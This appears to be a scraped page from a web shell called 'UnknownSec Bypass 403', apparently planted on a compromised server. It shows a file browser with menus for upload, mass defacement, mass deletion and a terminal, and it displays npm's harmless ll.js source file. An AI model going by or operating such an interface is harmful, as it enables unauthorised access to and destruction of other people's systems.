UnknownSec Bypass
403
:
/
home
/
ubuntu
/
.nvm
/
versions
/
node
/
v16.13.1
/
lib
/
node_modules
/
npm
/
lib
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
ll.js
const LS = require('./ls.js') class LL extends LS { /* istanbul ignore next - see test/lib/load-all-commands.js */ static get name () { return 'll' } /* istanbul ignore next - see test/lib/load-all-commands.js */ static get usage () { return ['[[<@scope>/]<pkg> ...]'] } exec (args, cb) { this.npm.config.set('long', true) super.exec(args, cb) } } module.exports = LL
Copyright © 2025 - UnknownSec